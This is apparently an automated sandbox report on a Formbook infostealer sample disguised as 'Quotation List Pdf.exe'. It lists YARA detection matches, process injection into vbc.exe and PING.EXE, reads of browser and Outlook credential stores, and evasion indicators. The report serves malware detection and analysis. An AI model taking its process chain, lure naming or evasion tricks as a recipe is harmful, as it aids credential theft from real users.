            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CCC07_2_0308CCC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BBC37_2_0366BBC3
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BAA57_2_0366BAA5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BF5C7_2_0366BF5C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366AFC87_2_0366AFC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BD2B7_2_0366BD2B
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: String function: 00007FF76843DBD0 appears 64 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 0383B970 appears 266 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 038CF290 appears 105 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 03885130 appears 36 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 03897E54 appears 88 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 038BEA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0588EA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0580B970 appears 266 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0589F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05855130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05867E54 appears 88 times
            Source: Quotation List Pdf.exeBinary or memory string: OriginalFilename vs Quotation List Pdf.exe
            Source: Quotation List Pdf.exe, 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
            Source: Quotation List Pdf.exeBinary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Quotation List Pdf.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9967180198598131
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/1@12/10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768442F60 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF768442F60
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
            Source: C:\Windows\SysWOW64\PING.EXEFile created: C:\Users\user\AppData\Local\Temp\y870G2JOQJump to behavior
            Source: Quotation List Pdf.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PING.EXE, 00000007.00000002.3297913979.0000000003184000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738191649.0000000003136000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738319140.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3297913979.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1740582907.0000000003160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quotation List Pdf.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeFile read: C:\Users\user\Desktop\Quotation List Pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation List Pdf.exe "C:\Users\user\Desktop\Quotation List Pdf.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Quotation List Pdf.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: Quotation List Pdf.exeStatic file information: File size 2404352 > 1048576
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Quotation List Pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Quotation List Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Quotation List Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Quotation List Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Quotation List Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Quotation List Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Quotation List Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Quotation List Pdf.exeStatic PE information: section name: .managed
            Source: Quotation List Pdf.exeStatic PE information: section name: hydrated
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418865 push 9C409E68h; retf 5_2_004188A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00411812 push ecx; iretd 5_2_00411815
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004141BD push edx; retn A625h5_2_004141E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00406A65 push cs; ret 5_2_00406A66
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00403320 push eax; ret 5_2_00403322
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00408320 pushfd ; ret 5_2_0040832B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004083A0 pushfd ; iretd 5_2_004083CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041EDE3 push esp; retf 5_2_0041EE5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00401609 push ss; ret 5_2_0040160A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041875E pushad ; ret 5_2_0041877A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418703 pushad ; ret 5_2_0041877A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058109AD push ecx; mov dword ptr [esp], ecx5_2_058109B6
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C7C75 push cs; ret 6_2_043C7C76
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C9530 pushfd ; ret 6_2_043C953B
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C95B0 pushfd ; iretd 6_2_043C95DC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043DF789 push es; retf 6_2_043DF7A2
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043DFFF3 push esp; retf 6_2_043E006D
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043E0038 push esp; retf 6_2_043E006D
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043E00E3 push edi; ret 6_2_043E00EB
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D9913 pushad ; ret 6_2_043D998A
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D996E pushad ; ret 6_2_043D998A
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D2A22 push ecx; iretd 6_2_043D2A25
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D9A75 push 9C409E68h; retf 6_2_043D9AB3
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03811200 push eax; iretd 7_2_03811369
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381225F pushad ; ret 7_2_038127F9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381B008 push es; iretd 7_2_0381B009
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038127FA pushad ; ret 7_2_038127F9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038409AD push ecx; mov dword ptr [esp], ecx7_2_038409B6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03819939 push es; iretd 7_2_03819940
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381283D push eax; iretd 7_2_03812858
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A0FB4 push edi; iretd 7_2_030A0F8F
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory allocated: 16FC7390000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583BD30 rdtscp 5_2_0583BD30
            Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 3883Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 6090Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\PING.EXEAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep count: 3883 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep time: -7766000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep count: 6090 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep time: -12180000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
